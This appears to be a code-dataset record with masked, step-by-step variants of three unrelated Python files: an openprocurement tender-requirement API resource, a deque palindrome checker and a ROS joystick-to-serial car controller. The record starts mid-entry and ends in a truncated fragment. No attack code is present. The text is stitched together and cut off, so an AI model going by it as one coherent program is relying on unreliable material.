self.request.context.\n requirements]}\n\n @json_view(permission='view_tender')\n def get(self):\n return {'data': self.request.validated['requirement'].serialize('view')\n }\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = 
self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n 
return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-4": "from copy import copy\nfrom openprocurement.api.utils import json_view, context_unpack, APIResource, get_now\nfrom openprocurement.tender.core.utils import save_tender, apply_patch\nfrom openprocurement.tender.core.validation import validate_requirement_data, validate_patch_requirement_data, validate_operation_ecriteria_objects, validate_patch_exclusion_ecriteria_objects, validate_change_requirement_objects, validate_put_requirement_objects\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n\n 
@json_view(permission='view_tender')\n def get(self):\n return {'data': self.request.validated['requirement'].serialize('view')\n }\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n 
tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom copy import copy\n\nfrom openprocurement.api.utils import (\n json_view,\n context_unpack,\n APIResource,\n get_now,\n)\nfrom openprocurement.tender.core.utils import save_tender, apply_patch\nfrom openprocurement.tender.core.validation import (\n validate_requirement_data,\n validate_patch_requirement_data,\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_change_requirement_objects,\n validate_put_requirement_objects,\n)\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def collection_post(self):\n\n requirement = self.request.validated[\"requirement\"]\n self.request.context.requirements.append(requirement)\n tender = self.request.validated[\"tender\"]\n if (\n self.request.authenticated_role == \"tender_owner\"\n and tender.status == \"active.tendering\"\n and hasattr(tender, \"invalidate_bids_data\")\n ):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"Created requirement group requirement {}\".format(requirement.id),\n extra=context_unpack(\n self.request,\n {\"MESSAGE_ID\": \"requirement_group_requirement_create\"},\n {\"requirement_id\": requirement.id},\n ),\n )\n self.request.response.status = 201\n self.request.response.headers[\"Location\"] = self.request.route_url(\n \"{}:Requirement Group Requirement\".format(self.request.validated[\"tender\"].procurementMethodType),\n tender_id=self.request.validated[\"tender_id\"],\n criterion_id=self.request.validated[\"criterion\"].id,\n requirement_group_id=self.request.validated[\"requirement_group\"].id,\n requirement_id=requirement.id\n )\n return {\"data\": requirement.serialize(\"view\")}\n\n @json_view(permission=\"view_tender\")\n def 
collection_get(self):\n return {\"data\": [i.serialize(\"view\") for i in self.request.context.requirements]}\n\n @json_view(permission=\"view_tender\")\n def get(self):\n return {\"data\": self.request.validated[\"requirement\"].serialize(\"view\")}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated[\"tender\"]\n\n if self.request.authenticated_role == \"tender_owner\" and hasattr(tender, \"invalidate_bids_data\"):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"Updated {}\".format(requirement.id),\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_group_requirement_patch\"}),\n )\n return {\"data\": requirement.serialize(\"view\")}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_put_requirement_objects,\n validate_patch_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated[\"data\"].get(\"status\") != \"cancelled\":\n model = type(old_requirement)\n data = copy(self.request.validated[\"data\"])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n # To avoid new version creation if no changes and only id's were regenerated\n if \"eligibleEvidences\" not in self.request.json.get(\"data\", {}):\n data[\"eligibleEvidences\"] = [\n evidence.to_primitive(role=\"create\") for evidence in getattr(old_requirement, \"eligibleEvidences\")\n ]\n\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {\"data\": 
(old_requirement.serialize(\"view\"),)}\n\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated[\"requirement_group\"].requirements.append(requirement)\n\n if old_requirement.status == \"active\":\n old_requirement.status = \"cancelled\"\n old_requirement.dateModified = get_now()\n\n tender = self.request.validated[\"tender\"]\n if (\n self.request.authenticated_role == \"tender_owner\"\n and tender.status == \"active.tendering\"\n and hasattr(tender, \"invalidate_bids_data\")\n ):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"New version of requirement {}\".format(requirement.id),\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_group_requirement_put\"}),\n )\n return {\"data\": (requirement.serialize(\"view\"), old_requirement.serialize(\"view_old\"))}\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
class Node:
    """Node of a doubly linked list: a payload plus prev/next links."""

    def __init__(self, data):
        self.data = data
        self.next = None
        self.prev = None


class dequeue:
    """Doubly linked double-ended queue with a palindrome checker.

    Bug fixes relative to the original:
      * ``remove_front``/``remove_last`` now decrement ``count`` even
        when the removed node was the only element (previously the early
        return skipped the decrement, leaving ``count`` stale at 1).
      * Methods operate on ``self`` instead of the module-level global
        ``llist``, so any instance works regardless of its name.
    """

    def __init__(self):
        self.front = None  # first node, or None when empty
        self.last = None   # last node, or None when empty
        self.count = 0     # number of stored elements

    def add_front(self, data):
        """Insert ``data`` at the front of the deque."""
        new_nodef = Node(data)
        if self.front is None:
            # Empty deque: the new node is both ends.
            self.front = self.last = new_nodef
        else:
            new_nodef.next = self.front
            self.front.prev = new_nodef
            self.front = new_nodef
        self.count += 1

    def add_last(self, data):
        """Insert ``data`` at the back of the deque."""
        new_nodeb = Node(data)
        if self.last is None:
            self.last = self.front = new_nodeb
        else:
            new_nodeb.prev = self.last
            self.last.next = new_nodeb
            self.last = new_nodeb
        self.count += 1

    def print_list(self):
        """Print the elements front-to-back, one per line."""
        temp = self.front
        while temp is not None:
            print(temp.data)
            temp = temp.next

    def remove_front(self):
        """Remove the front element; no-op when the deque is empty."""
        if self.front is None:
            return
        self.front = self.front.next
        self.count -= 1          # BUG FIX: always account for the removal
        if self.front is None:
            self.last = None     # deque became empty
        else:
            self.front.prev = None

    def remove_last(self):
        """Remove the back element; no-op when the deque is empty."""
        if self.last is None:
            return
        self.last = self.last.prev
        self.count -= 1          # BUG FIX: always account for the removal
        if self.last is None:
            self.front = None    # deque became empty
        else:
            self.last.next = None

    def is_empty(self):
        """Return True when the deque holds no elements."""
        return self.count == 0

    def size(self):
        """Print the number of stored elements."""
        print(self.count)

    def entry(self):
        """Prompt for a string and report whether it is a palindrome."""
        pal_to_check = str(input("Enter the string to check whether palindrome or not :"))
        pal_list = [str(i) for i in pal_to_check]
        print(pal_list)
        # BUG FIX: call through self instead of the global ``llist``.
        pal_check_con = self.pal_check(pal_list)
        print("Is palindrome :", pal_check_con)

    def pal_check(self, pal_lis):
        """Return True iff the characters in ``pal_lis`` form a palindrome.

        Loads the characters into this deque, then consumes it while
        comparing the two ends.  Empty and single-element inputs count
        as palindromes.
        """
        for ch in pal_lis:
            # BUG FIX: use self, not the module-level ``llist``.
            self.add_front(ch)
        while self.count != 0:
            if self.front.data != self.last.data:
                return False
            self.remove_front()
            if self.count > 1:
                self.remove_last()
            if self.count == 1:
                break
        return True
# Driver: build an empty deque and run the interactive palindrome check.
if __name__=="__main__":
    llist = dequeue()
    llist.entry()
|
normal
|
{
"blob_id": "2f6e0b6a7e14ac9c5a38db6fd2b1cf23cff7144e",
"index": 172,
"step-1": "<mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n <mask token>\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n <mask token>\n\n def size(self):\n print(self.count)\n <mask token>\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n <mask token>\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-3": "class Node:\n <mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n\n def add_last(self, data):\n new_nodeb = Node(data)\n if self.last == None:\n self.last = self.front = new_nodeb\n self.count += 1\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb\n self.count += 1\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-4": "class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n\n def add_last(self, data):\n new_nodeb = Node(data)\n if self.last == None:\n self.last = self.front = new_nodeb\n self.count += 1\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb\n self.count += 1\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-5": "class Node:\n\n def __init__(self,data):\n self.data = data\n self.next = None\n self.prev = None \n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if(self.front == None):\n self.front = self.last = new_nodef\n self.count +=1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count +=1\n\n \n def add_last(self,data):\n new_nodeb = Node(data)\n if(self.last == None):\n self.last = self.front = new_nodeb\n self.count +=1\n\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb \n self.count +=1\n \n def print_list(self):\n if(self.front == None):\n return\n temp = self.front\n while(temp != None):\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if(self.front == None):\n return\n else:\n self.front = self.front.next\n if(self.front == None):\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if(self.last == None):\n return\n else:\n self.last = self.last.prev\n if(self.last == None):\n self.front = None\n return\n self.count -= 1 \n self.last.next = None\n \n def is_empty(self):\n if(self.count == 0):\n return True\n else: \n return False\n def size(self):\n print(self.count)\n \n\n def entry(self):\n \n pal_to_check = str(input(\"Enter the string to check whether palindrome or not :\"))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print(\"Is palindrome :\",pal_check_con)\n \n def pal_check(self, pal_lis): \n for i in pal_lis:\n llist.add_front(i)\n while(self.count != 0):\n if(self.front.data == self.last.data):\n llist.remove_front()\n if(self.count > 1):\n llist.remove_last() \n else:\n return False\n if(self.count == 1):\n break \n return True\n\n\n#Driver function\nif __name__==\"__main__\":\n \n llist = dequeue()\n llist.entry()\n\n",
"step-ids": [
8,
10,
12,
13,
15
]
}
|
[
8,
10,
12,
13,
15
] |
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
import serial
from sys import platform
# Open the serial link to the vehicle controller at import time; the
# device name is platform specific.
# NOTE(review): on macOS (darwin) ``ser`` is never created, so any later
# ``ser.write`` raises NameError -- confirm this branch is intentional.
if platform == "linux" or platform == "linux2":
    ser = serial.Serial('/dev/ttyACM0')
elif platform == "darwin":
    pass
elif platform == "win32":
    # Windows: serial devices appear as COM ports.
    ser = serial.Serial('COM16')
"""
In this test code we are testing basic vehicle control over the network
we use ROS middleware to send the control commands
This script runs at the remote driver end.
Receives joystick messages (subscribed to Joy topic)
then converts the joystick inputs into commands
WE ARE NOT USING THIS METHOD NOW
--- WE HAVE SEPERATED OUT ALL THE STREAMS FROM THE JOYSTICK
"""
# Cross-callback state for the joystick handler below.
oldvar = 0   # last throttle value actually sent; used to rate-limit writes
first_a = 0  # latch: steering command for button 4 already sent this press
first_d = 0  # latch: steering command for button 5 already sent this press
# Configuration tuned for CAR in LOW speed
base_throttle = 5500  # lowest active throttle command written to serial
peak_throttle = 6500  # highest throttle command written to serial
base_brake = 450      # brake fully released
peak_brake = 600      # brake fully engaged (also used for emergency brake)
button = 0   # previous sum of tracked buttons, for release-edge detection
def callback(data):
    """Translate one sensor_msgs/Joy message into serial commands.

    Commands are written as ASCII integers terminated by the letter
    'a'.  From the writes below: 450-600 drives the brake, 5500-6500
    drives the throttle, and 1000/2000/3000 appear to be steering
    commands for the two shoulder buttons and release -- TODO confirm
    against the microcontroller firmware.
    """
    # Cross-call state: press latches, last throttle sent, tuning
    # bounds, and the previous button sum (see module globals).
    global first_a
    global first_d
    global oldvar
    global base_throttle
    global peak_throttle
    global base_brake
    global peak_brake
    global button
    # print data
    # Axes are negated so that pulling the stick back gives positive axis1.
    axis1 = -data.axes[1]
    axis3 = -data.axes[3] # in logitech axis 3 is axis 4 confirm with ashish
    button1 = data.buttons[1]
    button4 = data.buttons[4]
    button5 = data.buttons[5]
    # Sum of the tracked buttons; compared with the previous sum below
    # to detect the moment any of them is released.
    button_ = button1+button4+button5
    # Stick pulled back: brake proportionally within [base_brake, peak_brake].
    if axis1 > 0.1:
        bval = int((axis1) * (peak_brake - base_brake) + base_brake)
        print(bval)
        ser.write(str(bval).encode('utf-8'))
        ser.write("a".encode('utf-8'))
        #### ser.write("4000a".encode('utf-8')) #throttle released on braking
        print("Brake")
    # Stick pushed forward: average both axes into a throttle demand.
    elif (axis1 < -0.1 and axis3 < 0.1):
        tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle - base_throttle) * 0.5 + base_throttle)
        # Rate-limit: resend only when the demand moved by more than 5.
        if (abs(tval - oldvar) > 5):
            #print(tval)
            ser.write(str(tval).encode('utf-8'))
            ser.write("a".encode('utf-8'))
            ser.write("450a".encode('utf-8')) # brake released on acceleration
            print("Throttle")
            oldvar = tval
    # Stick centred: idle throttle and release the brake.
    elif (axis1 > -0.1 and axis1 < 0.1):
        ser.write("4000a".encode('utf-8'))
        ser.write("450a".encode('utf-8'))  # brake released
        print("Zero Throttle")
    print (axis1)
    print (axis3)
    # Emergency stop: drop throttle and apply full brake.
    if button1 == 1:
        print("Emergency Brake")
        ser.write("4600a".encode('utf-8')) # throttle released
        ser.write("600a".encode('utf-8')) # brake engaged
    # Shoulder buttons: send a command once per press; the first_a /
    # first_d latches hold until the release edge handled below.
    if (button4 and button5 == 0):
        if (first_a == 0):
            ser.write("1000a".encode('utf-8'))
            print("Joystick button 4 pressed.")
            first_a = 1
    if (button5 and button4 == 0):
        if (first_d == 0):
            ser.write("2000a".encode('utf-8'))
            print("Joystick button 5 pressed.")
            first_d = 1
    # Button sum changed since the last message: something was released,
    # so clear the latches and send the release command.
    if(button-button_!= 0):
        if(button4 == 0):
            first_a = 0
        if(button5 == 0):
            first_d = 0
        ser.write("3000a".encode('utf-8'))
        print("Joystick button released.")
    button = button_
# Initializes everything
def start():
rospy.Subscriber("joy", Joy, callback)
# starts the node
rospy.init_node('Joy2Turtle')
rospy.spin()
if __name__ == '__main__':
start()
|
normal
|
{
"blob_id": "14a357f3dfb3d59f1d8cfd566edeaf8b0e5bb56d",
"index": 374,
"step-1": "<mask token>\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\n<mask token>\n",
"step-2": "<mask token>\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-3": "<mask token>\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\noldvar = 0\nfirst_a = 0\nfirst_d = 0\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n 